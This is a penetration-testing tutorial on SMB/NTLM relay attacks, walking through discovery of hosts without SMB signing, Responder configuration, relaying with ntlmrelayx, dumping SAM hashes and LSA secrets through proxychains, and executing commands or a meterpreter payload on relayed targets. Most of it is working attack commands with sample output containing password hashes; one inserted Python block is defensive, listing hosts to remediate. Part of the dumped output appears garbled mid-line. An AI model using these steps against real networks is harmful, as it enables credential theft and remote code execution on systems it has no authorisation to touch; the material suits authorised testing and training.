SMB relay
Instead of cracking hashes to find the clear password, you can relay those hashes to specific machines and potentially gain access.
To refresh your memory on the different NTLM flavours, relaying 101 and the pass-the-hash attack, I suggest reading these two great posts:
Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes) // byt3bl33d3r // /dev/random > blog.py
Pass the Hash Attack Tutorial | Lateral Movement using LanMan or NTLM hashes
Now, this attack requires two things:
  • SMB signing must be disabled on the target
  • The relayed user's credentials must be admin on the target machine (we can't relay the hash back to the machine it came from since MS08-068, and the user we're relaying must have admin rights on the target if we want code execution; otherwise we only get user-level access, for example to an open share)
In order to relay hashes, we must have valid targets. Valid targets are, as described above, machines with SMB signing disabled. To get a list of those valid targets we can use, for example, CrackMapExec:

cme smb <entire network ip>/<cidr> --gen-relay-list Targets.txt

or Nmap:

nmap --script=smb2-security-mode.nse -p445 <entire network ip>
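The same scan serves the defender: hosts that do not enforce signing are the ones to fix before anyone relays to them. The Python below is an added example, not code from the original page or from the nmap project; it parses nmap's normal output for the command above and lists hosts to remediate. The sample output is constructed, and the three "Message signing ..." phrasings are assumed from the script's usual wording.

```python
import re
from typing import Dict, List

# Constructed sample of nmap normal output for the smb2-security-mode script;
# hosts and results are made up, only the structure mirrors real output.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.0.0.5
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
Nmap scan report for dc01.example.local (10.0.0.17)
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
Nmap scan report for 10.0.0.23
Host script results:
| smb2-security-mode:
|   2.1:
|_    Message signing disabled and not required!
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?([\d.]+)\)?")  # "ip" or "name (ip)"
STATUS_RE = re.compile(r"Message signing (.+)")


def parse_signing_status(nmap_output: str) -> Dict[str, str]:
    """Map each host to 'required', 'not_required' or 'disabled' (result wording assumed)."""
    status: Dict[str, str] = {}
    host = None
    for line in nmap_output.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)  # remember which host the following script lines belong to
            continue
        m = STATUS_RE.search(line)
        if m and host:
            text = m.group(1).lower()
            if "disabled" in text:
                status[host] = "disabled"
            elif "not required" in text:
                status[host] = "not_required"
            else:
                status[host] = "required"
    return status


def hosts_needing_remediation(nmap_output: str) -> List[str]:
    """Hosts that do not enforce signing, i.e. the relay prerequisite from the text."""
    return sorted(h for h, s in parse_signing_status(nmap_output).items() if s != "required")
```

Feed it the output of `nmap --script=smb2-security-mode.nse -p445 <range> -oN scan.txt` to get the list of machines where signing must be enforced.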
NOTE: By default, SMB signing is enabled on all DC servers.

Now off to capturing the hashes, but first we need to change a small piece of configuration in the responder.conf file (/usr/share/responder/responder.conf). SMB and HTTP are turned off because ntlmrelayx.py will bind to those ports itself:

[Responder Core]

; Servers to start
SQL = On
SMB = Off # Turn this off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off # Turn this off
HTTPS = On
DNS = On
LDAP = On

Then fire up Responder again:

python responder.py -I <interface> -rdwv
Now off to the relay: pop a new shell and use ntlmrelayx.py to relay the intercepted hashes to the targets gathered earlier:

ntlmrelayx.py -tf Targets.txt -socks -smb2support

You should see relayed sessions appearing in your ntlmrelayx window.
Now, what can we do with the opened sessions? If you type socks at the ntlmrelayx prompt you should see something like this:

ntlmrelayx> socks
Protocol  Target          Username                  Port
--------  --------------  ------------------------  ----
SMB       192.168.48.38   VULNERABLE/NORMALUSER3    445
MSSQL     192.168.48.230  VULNERABLE/ADMINISTRATOR  1433
MSSQL     192.168.48.230  CONTOSO/NORMALUSER1       1433
SMB       192.168.48.230  VULNERABLE/ADMINISTRATOR  445
SMB       192.168.48.230  CONTOSO/NORMALUSER1       445
SMTP      192.168.48.224  VULNERABLE/NORMALUSER3    25
SMTP      192.168.48.224  CONTOSO/NORMALUSER1       25
IMAP      192.168.48.224  CONTOSO/NORMALUSER1       143
To interact with these sessions we'll use proxychains, but first you need to edit its configuration file, /etc/proxychains.conf, so that it points at the SOCKS server ntlmrelayx started:

[ProxyList]
socks4 <yourIP> 1080
Now that's done, you can for example retrieve local hashes using secretsdump through the relayed session:

# proxychains ./secretsdump.py vulnerable/[email protected]
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies

Password:
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa6016dd8f2ac5de40e5a364848ef880c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aeb450b6b165aa734af28891f2bcd2ef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:40cb4af33bac0b739dc821583c91f009:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:ce6b7945a2ee2e8229a543ddf86d3ceb:::
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
pcadminuser2:6a8bf047b955e0945abb8026b8ce041d:VULNERABLE.CONTOSO.COM:VULNERABLE:::
Administrator:82f6813a7f95f4957a5dc202e5827826:VULNERABLE.CONTOSO.COM:VULNERABLE:::
normaluser1:b18b40534d62d6474f037893111960b9:CONTOSO.COM:CONTOSO:::
serviceaccount:dddb5f4906fd788fc41feb8d485323da:VULNERABLE.CONTOSO.COM:VULNERABLE:::
normaluser3:a24a1688c0d71b251efec801fd1e33b1:VULNERABLE.CONTOSO.COM:VULNERABLE:::
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
VULNERABLE\WIN7-A$:aad3b435b51404eeaad3b435b51404ee:ef1ccd3c502bee484cd575341e4e9a38:::
[*] DPAPI_SYSTEM
0000 01 00 00 00 1C 17 F6 05 23 2B E5 97 95 E0 E4 DF ........#+......
0010 47 96 CC 79 1A C2 6E 14 44 A3 C1 9E 6D 7C 93 F3 G..y..n.D...m|..
0020 9A EC C6 8A 49 79 20 9D B5 FB 26 79 ....Iy ...&y
DPAPI_SYSTEM:010000001c17f605232be59795e0e4df4796cc791ac26e1444a3c19e6d7c93f39aecc68a4979209db5fb2679
[*] NL$KM
0000 EB 5C 93 44 7B 08 65 27 9A D8 36 75 09 A9 CF B3 .\.D{.e'..6u....
0010 4F AF EC DF 61 63 93 E5 20 C5 4F EF 3C 65 FD 8C O...ac.. .O.-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
Or even get code execution via smbexec, atexec and the other Impacket example scripts:

proxychains smbexec.py <domain>/<relayedUser>@192.168.10.60

proxychains atexec.py <domain>/<relayedUser>@192.168.10.60 "<cmd>"
You can also specify the command you want to execute on each relayed target before launching ntlmrelayx:

ntlmrelayx.py -tf targets.txt -socks -smb2support -c "whoami"

or set up a meterpreter listener and get shell access via Metasploit by having ntlmrelayx execute your payload:

ntlmrelayx.py -tf targets.txt -socks -smb2support -e test.exe